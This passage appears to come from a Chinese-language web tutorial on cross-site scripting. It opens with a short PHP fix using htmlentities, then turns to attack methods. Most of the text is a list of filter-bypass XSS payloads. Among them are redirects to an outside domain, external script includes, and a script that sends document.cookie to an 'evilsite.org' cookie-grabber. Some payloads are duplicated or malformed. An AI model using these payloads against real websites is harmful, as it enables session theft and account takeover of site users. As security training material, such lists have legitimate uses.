|
在第16行放置
<body>
<span class="alerte">Search result :</span> <strong><?php echo $_POST['Vulnerability']; ?></strong>
</body>
By:
<body>
<span class="alerte">Search result :</span> <strong><?php
if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?></strong>
</body>
use htmlspecialchars() function in PHP
other function:
htmlentities() quotes
strip_tags()
...
____ ____
要想进行一个XSS攻击是相当简单的事情,这里有些常用的方法:
利用image:
<IMG SRC="/Article/UploadFiles/200805/20080504093657109.png">
利用flash:
<EMBED SRC="http://hax0r.com/Haxored.swf">
重定向:
<script>window.open( "http://lovelaozang.cn/xss.html" )</script>
还有:
<meta http-equiv="refresh" content="0; url=http://lovelaozang.cn/xss.html" />
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 6 - 过滤绕过 :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
事实上也不是那么简单就能绕过
htmlspecialchars()
这里有一些关于绕过xss的例子:
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\"CONTENT=\"0;url=javascript:alert('XSS');\">
'">><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'>><marquee><h1>XSS</h1></marquee>
"><script alert(String.fromCharCode(88,83,83))</script>
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
<div
style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo
de(88,83,83));'))">
window.alert("Xyli !";
"/></a></><img src=1.gif onerror=alert(1)>
[color=red' onmouseover="alert('xss')"]mouse over
<body onLoad="alert('XSS');"
<body onunload="javascript:alert('XSS');">
click me
<script language="JavaScript">alert('XSS')</script>
<img src="javascript:alert('XSS')">
'); alert('XSS
<font style='color:expression(alert(document.cookie))'>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
</textarea><script>alert(/xss/)</script>
</title><script>alert(/xss/)</script>
<script src=http://yoursite.com/your_files.js></script>
"><script>alert(0)</script>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav	ascript:alert('XSS');\">
<marquee><script>alert('XSS')</script></marquee>
<? echo('<scr)';
echo('ipt>alert(\"XSS\"</script>'); ?>
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav	ascript:alert('XSS');\">
<marquee><script>alert('XSS')</script></marquee>
<style>@im\port'\ja\vasc\ript:alert(\"XSS\"';</style>
<img src=foo.png onerror=alert(/xssed/) />
<script>alert(String.fromCharCode(88,83,83))</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+
escape(document.cookie)</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>alert('XSS');</script>
<script>alert(1);</script>
Flash是用来做复杂的动画,模拟的,创造游戏等。
上一页 [1] [2] [3] 下一页 |
爱心红客
